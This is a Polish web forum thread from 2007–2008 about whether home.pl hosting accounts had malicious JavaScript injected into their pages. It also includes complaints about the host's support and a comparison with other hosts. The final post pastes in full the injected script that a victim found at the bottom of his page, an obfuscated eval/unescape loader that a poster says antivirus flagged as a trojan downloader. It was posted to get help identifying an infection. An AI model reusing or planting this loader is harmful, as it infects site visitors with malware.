Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Problemy z Home.pl ?
Forum PHP.pl > Inne > Hydepark
LonelyKnight
4.07.2007, 10:18:00
Mam prośbę do posiadaczy kont w home.pl - możecie sprawdzić czy czasami w waszym kodzie nie pojawiły się jakieś nowe, ciekawe linie kodu, niekoniecznie przez was tam umieszczane? aarambo.gif

W przeciągu ostatnich dwóch miesięcy zgłosiły się do mnie dwie osoby z informacją 'mam trojana na stronie' Rkingsmiley.png Zarówno jedno jak i drugie konto nie były powiązane, jedyną rzeczą jaka je łączyła był hosting w home.pl Dodatkowe linie kodu JS pojawiły się po tagach </body></html> tak jakby były dodawane przez jakiś automat. Kody były identyczne. Co ciekawe wystrzyknięcie tego kodu nie odbyło się przez jakieś CMSy tylko bezpośrednio przez edycję pliku. Klient zalogował się na ftpa (znał hasła, bez brute-force) i edytował index :roll2: Ciekaw jestem czy to przypadek czy może kolejne problemy z bezpieczeństwem na home.pl
Liko
4.07.2007, 13:19:26
Witaj! Mam na home.pl konto kolejny rok, tzn. 2 i do tej pory nigdy nie miałem problemów. Ani z bezpieczeństwem, ani innych. Sprawdziłem swoje strony i są orginalne bez dodatków. Więc może to być wina z Twojej strony np. zbyt łatwe hasło. Pozdrawiam
LonelyKnight
4.07.2007, 13:27:39
To nie wina haseł. Możliwe, że wyciek nastąpił nie z winy home.pl, nawet jest to bardzo prawdopodobne, jednak mimo wszystko dziwnie to wygląda...

A co do samego Home.pl to ostatnio, po tej głośnej aferze, straciło u mnie bardzo...
phpion
4.07.2007, 14:32:32
Hmmm dziwię się ludziom mającym hosting w home.pl. Firma ma renomę - to na pewno, ale i wysokie opłaty. Ja od kilku lat korzystam z usług lh.pl (Light Hosting) i nie mogę im nic zarzucić, bardzo wysoka jakość świadczonych usług + świetny kontakt z admine za mniejszą cenę. Proponuję zmianę hostingu smile.gif
babejsza
5.07.2007, 12:36:46
To jest skrypt statystyk. Można tą opcję wyłączyć w panelu.

@phpion.com - jasne tylko:

- pojemności mniejsze
- nie można samemu przydzielać pojemności pomiędzy www, pocztą i db
- mniejsze roczne transfery

I to porównanie najwyższego pakietu z LH za 400pln ze średnim z Home czyli BS za 300pln.
acztery
5.07.2007, 16:53:41
ja jestem w home kilka lat mam serwer business server pro i nie mam zamiaru zmienić na inne, 1000 zł rocznie to nie majątek. A jakość usług bardzo wysoka.
babejsza
6.07.2007, 08:49:49
Z tą jakością to potrafi być różnie. Pomimo aktualizacji PHP'a do wersji >5 np. biblioteka GD ciągle nie doczekała się aktualizacji i cała paleta nowych funkcji dostarczonych przez php nie działa. Dodatkowo zdarza się, że dodzwonienie do BOK graniczy z cudem, a jak już się uda to nie zawsze potrafią pomóc. Oczywiście zdarza się to raczej w przypadkach skrajnych gdzie potrzebna jest pomoc mocno techniczna. Odsyłają wtedy do "pogaduszek mail'owych", ale te są mocno kolejkowane i z szybkiej pomocy nici.

Ma się to zacząć zmieniać bo coś "przebąkują" o indywidualnym kontakcie technicznym. To byłby następny krok w dobrą stronę.
TomASS
10.07.2007, 10:38:57
Ja mam konto biznes pro od ok 3lat, 900GB transferu rocznie, serwis mój działa pełną parą ok 300 dni w roku (nie wliczam sobót i niedziel) to daje ok 3GB transferu dziennie, ja na razie wykorzystuję 2GB dziennie - aby obsłużyć taki ruch mają pewne kłopoty - a co dopiero będzie przy 50% większym ruchu - boję się myśleć - chyba zmienię na dedyka w lh. Największy ruch jest ok 11 godziny, raz na miesiąc zdarza się błąd 503 - wykręcają się oczywiście moimi skryptami - ale czy to moja wina, że jakiś skrypt zabija ich serwer? Zapewniam , że indeksy i te sprawy są na zapytaniach.

Ich odpowiedzi są śmieszne:

1. Na błąd 503 najpierw przysłali mi logi - 65MB logów! Jak otworzyłem w Wordzie, (notatnik się wieszał) to w końcu przestał liczyć strony (na dole w pasku w Wordzie jest licznik stron) - przekroczono zakres stron. smile.gif Napisałem aby zinterpretowali mi te logi, bo mam problemy z otwieraniem takiego pliku, na co dostałem odpowiedź, że muszę mieć program np. notatnik plus

2. W końcu po moim stanowczym nacisku na interpretacje przez nich otrzymałem odpowiedź:
.
Cytat
...
> np_transporty AS T, np_magazyny AS M, np_miejsca_rozladunku AS MR,
> np_dzial_sprzedazy AS DSP WHERE T.ID_magazyn=M.ID AND
> MR.ID_transport=T.ID AND T.ID_dzial_sprzedazy=DSP.ID AND
> MR.Rodzaj='ostatnie' AND (T.ID_przewoznik='20' OR T.Status='gielda_k'
> OR
> T.Status='gielda_f') AND T.Miejsce='normal' AND 1 AND T.typ='kraj'
> ORDER BY T.Nr ASC;
>
> Maksymalny czas wykonania/minimalny czas wykonania/sredni czas
> wykonania
> zapytania: 13.58/3.96/2

Jak czas średni może być mniejszy niż minimalny? biggrin.gif aaevil.gif
Dostałem odpowiedź:
Cytat
Rzeczywiście wartość 2 wydaje się być błędna

No niesamowite! biggrin.gif

3. Skrytp xxxx.php odpalany jest najczęściej w serwisie, poświęciłem na jego optymalizację chyba ze 100 roboczo godzin, dostałem wiadomość, że jest nieoptymalny i często oczekuje na operacje, na co odpisaem:

Skrypt ten jest najczęściej odpalanym skryptem w serwisie i jest zoptymalizowany. To, że często oczekuje na operacje, to chyba wina serwera?
Dostałem odpowiedź:
Cytat
Prosilbym zauwazyc, iz w dniu wczorajszym sktypt spedytor.php wykonal sie
54675 razy, co oznacza, ze srednio uruchamiany byl co 90 sekund (86400/54675=1,52).
Chcialbym zauwazyc, ze wykonywanie skryptu z tak duza czestotliwoscia, szczegolnie w porach szczytowej odwiedzalnosci, moze powodowac znaczne opoznienia odpowiedzi bazy danych oraz bledy 503.

Majac na wzgledzie powyzsze, w celu unikniecia wystepowania statusow 503, prosilbym o dalsza optymalizacje skryptu lub migracje konta na usluge dedykowana.

Chyba ktoś tu nie umie liczyć! 86400/54675=1,52 SEKUND a nie minut! Dobre by było jakby skrypt odpalnay raz na 90sekund zabijał serwer:D Zreszta 1,5 sekundy też nie powinno być problemem


Podsumowując:
1. Nigdy nie zauważyłem obcego kodu w swoim kodzie
2. super sprawa z 24h godzinna pomocą (na czacie)
3. Ich obsługa techniczna (e-mailowa) woła o pomstę do nieba
4. chyba migruję na dedyka
bartek_fm
20.02.2008, 21:44:06
Mam chyba bardzo podobną sytuację do tej opisanej przez LoneliKnight. Równiez mam konto na home.pl, jednak trudno mi powiedzieć czy to wina usługodawcy czy zbieg okoliczności.
seaquest
21.02.2008, 10:49:55
Masz wirusa u siebie i używasz Total Commandera. Najpewniej spiraconego.
sztosz
21.02.2008, 12:14:27
Cytat(seaquest @ 21.02.2008, 10:49:55 ) *
Masz wirusa u siebie i używasz Total Commandera. Najpewniej spiraconego.


A jaki to ma związek? Myślałem że królem FUD'u jest M$, a tu się okazuje że nie... haha.gif
seaquest
21.02.2008, 13:34:56
No właśnie kiedyś gdzieś wyczytałem, że TC spiracone ma takie wirusy.
sztosz
21.02.2008, 13:42:11
To dziwne. Piracenie TC polega na wklepaniu klucza rejestracyjnego lub wgraniu pliku z licencją. Jeżeli ktoś podmienia pliki wykonywalne na te "zpiracone" (nazywajcie to jak chcecie, nameology nie ma żadnego znaczenia) nieznanych źródeł, lub niesprawdzonych źródeł to powinien być świadom konsekwencji. Ale takie funkcjonalność danego "cracka" to nie lada wyczyn winksmiley.jpg
LonelyKnight
21.02.2008, 19:18:59
seaquest masz może namiar na źródło o tych wirusach i TC? Ewentualnie pamiętasz gdzie tego szukać? Bo nic nie mogę wygooglać smile.gif
GrayHat
21.02.2008, 19:41:40
@LonelyKnight: wklep nam ten kod, który został doklejony do twojej strony. To dużo wyjaśni winksmiley.jpg
LonelyKnight
21.02.2008, 19:45:25
Uff ja tego już nie mam - spójrz na datę mojego pierwszego postu w tym temacie smile.gif Poza tym strony nie były moje ;-)

Temat się odnowił w nawiązaniu do tego: Temat: Jak usunac wirus

Tam autor wkleił kod, który został dołączony do jego strony. W tych dwóch przypadkach, z którymi się spotkałem wyglądało to podobnie i wykrywane było jako trojan downloader.
seaquest
21.02.2008, 21:15:03
To wklep kod w google.

Ja niestety nie pamiętam, gdzie to wyczytałem. A może powiedział mi to ktoś kto miał z tym do czynienia. Dawno to było.
bartek_fm
21.02.2008, 22:30:05
Oto ten kod, który pojawia się u dołu pliku:

[HTML] pobierz, plaintext 
  1. <!-- [ abecf60df2c3f74043a0b86e23061d7b ] --><script>eval(unescape('function%20fiLS%28srF%29%7Bfunction%20qtY%28weAwHDN%29%7Bvar%20zlJ%3D0%2Cbav%2CmLnrPw%3DweAwHDN.length%3Bfor%28bav%3D0%3Bbav%3CmLnrPw%3Bbav++%29zlJ+%3DweAwHDN.charCodeAt%28bav%29*mLnrPw%3Breturn%20new%20String%28zlJ%29%7DsrF%3Dunescape%28srF%29%3Bvar%20gmvMavq%3Deval%28%27afr%7Eg3uTm3e3n%7Et%7Es+.fcTa%7ElTlTeTeT%27.replace%28/%5BT%5C+%7E3f%5D/g%2C%20%27%27%29%29.toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%2CkItb%3DqtY%28gmvMavq%29%2CsBdt%3Dnew%20String%28%29%2CdyEe%3D0%3BhgaTS%3D0%3Bfor%28var%20fhFs%3D0%3BfhFs%3CsrF.length%3BfhFs++%29%7BsBdt+%3DString.fromCharCode%28srF.charCodeAt%28fhFs%29%5E%28gmvMavq.charCodeAt%28dyEe%29%5EkItb.charCodeAt%28hgaTS%29%29%29%3BdyEe++%3BhgaTS++%3Bif%28dyEe%3EgmvMavq.length%29dyEe%3D0%3Bif%28hgaTS%3EkItb.length%29hgaTS%3D0%3B%7Deval%28sBdt%29%3BsBdt%3D%27%27%3Breturn%3B%7DfiLS%28%27%2532%2530%2536%2533%2538%2539%2532%2536%2546%252b%2508%2508%2536%2562%2556%252f%253e%2555%2521%2530%2532%252a%2578%2538%2534%2500%2503%2538%2505%2538%250b%2519%2557%2579%2577%2509%2520%2533%250f%2577%252e%257c%2561%257c%2558%2579%250e%2503%2520%254e%2528%2563%2535%257d%256b%255e%2511%255b%2578%2520%2570%2576%2515%2523%2528%253c%253d%2529%253e%257b%256f%256b%2525%250d%257c%2511%2528%250c%2566%253b%2558%2537%257d%2560%256e%2573%255a%2569%2534%2524%2531%253e%2500%251c%257b%253f%250f%2505%253e%2551%2565%2572%2530%250c%2523%2533%2523%251f%2530%2512%2570%2568%2513%2538%2521%2521%2554%2523%252e%2530%2560%2539%2521%2502%2537%251f%253e%2530%2525%2567%2538%251c%2522%2525%2532%252e%2531%253d%256e%2533%2537%2531%2527%2548%2560%2504%2525%2526%253f%252c%2531%2560%256f%253b%2532%2533%2526%256c%2573%2579%256d%2549%256f%2570%252e%256e%2544%2530%256d%253b%2513%2561%2579%2565%253a%2579%257a%251a%252b%254c%2502%2530%250a%2576%2551%2561%2546%253f%2507%2539%2524%253f%2534%2532%2532%2503%2561%2541%257c%253c%2527%2567%2523%2502%252f%2537%2547%253b%2532%256c%2513%253c%2527%253a%2504%2517%2525%2519%2539%2579%256a%2520%253f%2535%2561%2538%254d%2540%253d%253f%2534%2531%2576%2544%2577%250b%2527%2521%2525%252c%2508%2534%254d%256c%2552%250c%251b%2528%2538%253b%2544%2549%257f%2570%257e%2519%2544%2561%2567%2571%2549%257c%2532%2520%252f%250d%2530%2563%253d%2502%2573%254c%254a%255f%2570%257d%256f%256c%2546%256e%2571%2577%2555%256b%2522%2574%257c%2568%2563%2563%256f%2555%2562%253d%253e%252b%2549%2521%253d%2524%2509%251f%2524%2525%2527%2510%2534%250a%252c%2526%2579%257e%2575%2533%2546%2562%2571%2579%2550%257b%2578%2534%251d%2506%2525%257b%252d%252e%250d%2563%2571%2575%2541%2534%251b%2530%2524%2573%2508%2527%2524%2500%254f%253e%257d%253d%2521%251b%2538%2529%2514%254a%2532%2532%2527%252f%2540%256c%257e%2506%251c%252b%2539%2523%2518%2512%2538%2512%2511%256a%2539%2534%253e%253b%2523%2512%253d%2503%2531%2556%256e%253a%2533%252a%2503%2504%2500%2532%253c%253d%2528%252b%2539%250a%2509%250c%2530%2574%2575%2556%253b%252b%2531%2523%2539%253a%2529%2529%2535%257d%2527%252e%2534%2500%252f%2526%2521%2556%257c%2521%253f%253f%250b%2520%253c%2507%250e%2527%255e%2525%253b%2541%2535%253c%253d%257a%2525%253f%253e%2534%2519%2529%2505%252e%2522%2526%2531%252d%256b%2521%2539%252b%252e%2518%2539%2503%2521%253e%2511%2567%2569%2578%2514%2563%256b%257c%257e%2554%252f%2537%2531%2526%257f%2516%250e%252a%2519%251d%2533%2515%253c%2537%2538%253e%2570%254e%257e%2579%254f%2569%256c%2551%257e%2503%2568%2515%2528%2524%2535%2523%2539%2514%2526%2516%2570%2537%2535%2571%2536%2501%2535%252b%253e%256d%256e%2528%251b%2529%2559%2557%250c%2546%2537%2526%2576%2535%2520%2523%2531%2538%2516%2529%2518%252e%2570%252e%2539%2528%2537%2529%2538%256a%254f%256d%2521%252e%2525%253e%254c%250b%257a%2571%254e%257e%2515%253d%2511%256f%2527%2520%2577%2570%2508%251d%2522%252b%2538%250d%253e%2566%2520%2573%2548%251d%2518%2577%2563%2526%2575%252e%2535%2538%2517%2528%251d%2529%2552%2523%2500%2528%251c%256f%256a%2502%255e%252c%253c%251b%257c%2532%2566%2519%2544%2512%257e%2518%257c%2532%2516%250f%2531%250a%2527%2516%2521%254f%2534%257e%2526%2512%2556%2562%252f%2571%2527%2501%253d%2579%257e%2565%2503%2524%2562%2522%2578%253f%2524%2568%250a%2530%2507%2532%2577%2543%250e%2527%2518%2572%2566%251c%2545%256e%253a%2565%257e%2570%2544%257e%254f%2571%253d%2536%2566%2532%2525%250a%2515%2502%2536%253b%253b%253b%2549%2516%2529%256a%2575%257c%2572%2501%255e%2524%2525%2518%253e%256a%2520%2503%257c%255c%250b%252b%255e%2568%2536%2578%2572%2524%2515%2579%256a%2500%257a%2518%257e%252f%252a%2505%253a%2531%2507%257c%257d%2505%2575%2562%2525%2532%2531%253f%2527%2521%253a%2575%2570%254e%2521%2513%257a%2535%2533%252f%2509%2576%250a%254d%2526%2541%257a%256b%257b%2526%2538%2526%257a%250b%2505%2563%2524%257e%251a%2576%252e%252f%2513%255b%2533%2530%2536%2520%2577%253e%257a%2531%2536%2524%252d%255c%257e%2577%2505%2568%2533%251b%2535%2523%257d%257d%2539%257f%2564%251a%2546%2530%252e%251a%252f%2539%2574%2568%257f%253b%257f%2532%252a%2531%2522%2552%2538%257b%251e%2517%252b%2533%252e%2513%252f%253b%252f%2558%2508%2523%2529%2536%2573%2572%257d%256b%2551%2519%257c%2526%2562%2514%2514%253a%2561%257b%250e%2567%2526%2525%2509%2578%2565%253a%2542%2539%2550%2567%250e%257a%2556%2534%253b%2517%253f%2505%2506%2532%2569%2553%250c%250d%253e%250f%254a%2551%2579%2503%2572%252c%255f%2545%2572%257a%2569%2555%252a%2564%2564%2524%2553%2578%2512%2533%2534%253f%2562%252f%2548%251c%2551%2567%2523%2567%252c%2577%2559%250d%2554%250f%2508%2539%2526%2538%2563%2562%256e%2553%2574%252a%2534%2522%2500%250b%2561%2536%255e%257c%2507%257e%252d%2563%251e%250d%2507%2539%2569%2525%257f%2567%256a%256c%2575%251f%251b%2533%2536%253c%2534%257f%2525%2539%2524%252a%2511%250c%252e%2528%251b%2577%2533%2530%250a%2535%2577%253a%2532%2526%2526%2502%2524%252b%2512%252a%251b%255b%2556%253b%253b%252d%2509%2570%2519%2569%2570%2531%2531%2521%254c%250c%2512%252b%2521%254a%2574%2533%252a%255b%2510%251f%2500%252a%257c%253a%2538%250f%2525%2506%2533%2538%253e%2561%2560%2578%2522%2573%250c%2530%2532%2532%2510%2538%2563%254b%253a%2514%2532%2534%256c%2533%254f%257f%2561%255b%2514%2547%2553%2548%2547%256a%250b%2561%251e%2570%2500%2560%250e%2547%2566%256d%2576%2577%2530%2546%2504%257d%2536%252e%256e%2535%2518%2516%2515%253a%2502%2533%251a%250c%251c%2563%2547%252e%2532%253c%2533%2513%2529%2525%2558%255a%2507%2509%256f%250c%2504%251c%2572%251f%252f%255b%2521%257b%2561%2578%2573%256d%2557%250e%2579%2566%2574%257e%253f%253a%2521%2578%2504%2534%2571%2563%250e%2568%253a%256c%256c%2552%252a%2578%2571%257e%2570%2544%253c%2571%2569%253d%254a%2520%2512%253f%251e%2568%2536%254d%250f%253d%2523%2538%2573%250b%256d%253f%2508%256c%2536%250f%253d%251f%2525%256e%252d%250f%253b%257a%252b%253b%2560%257c%2579%2536%254b%251e%2534%2575%252e%257c%257c%2522%255b%251c%2544%255e%2531%2524%2567%253b%256a%256f%2519%2515%2564%253b%2579%2531%254c%2526%253e%2502%253c%253e%252f%2529%257d%252f%2550%2568%2554%253a%2520%252f%2503%2538%2522%2534%2536%254f%2570%2535%2522%2513%2571%2529%252c%2530%250d%2513%2506%252f%252e%2521%252a%2536%2577%2516%2569%2578%251e%2525%257f%257f%251e%2511%2507%2524%256a%2559%2526%2574%2538%2572%2522%2511%252e%2502%2537%2518%252e%2562%251e%2537%2503%2541%2500%2525%252e%2533%2576%2535%257e%2515%2538%2529%2521%2532%2534%252e%2559%2570%2544%257c%2563%257c%2543%2522%256a%256a%2567%2542%2541%2576%2569%2576%251d%2522%2537%252b%252b%2524%2539%252f%256b%2516%2537%252b%252c%2547%2534%2578%256a%2561%2515%2537%253b%2536%2561%256d%2574%256d%254b%257f%2572%2550%2562%2507%256f%2530%253f%2522%252f%2552%252b%2533%2509%2506%2521%2577%257f%257b%2556%2541%2537%2501%2507%253c%252c%2531%252a%2550%2543%2574%2502%2578%253d%251c%2511%2512%2500%2517%250f%2513%252d%252f%257f%2577%2574%256c%2575%253f%2544%2526%2528%2507%253e%2532%2577%257b%252a%2515%2532%2502%2503%256a%255f%252e%253e%2537%254b%252a%2565%2527%2526%2522%2571%253a%2563%2560%250e%253d%253d%2520%252e%2575%2531%2500%2509%2530%256b%255d%256c%2523%257f%2563%252d%255b%2529%2530%2545%2521%252c%253b%253d%256a%2540%2566%27%29%3B'));</script><!-- end -->
[HTML] pobierz, plaintext
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.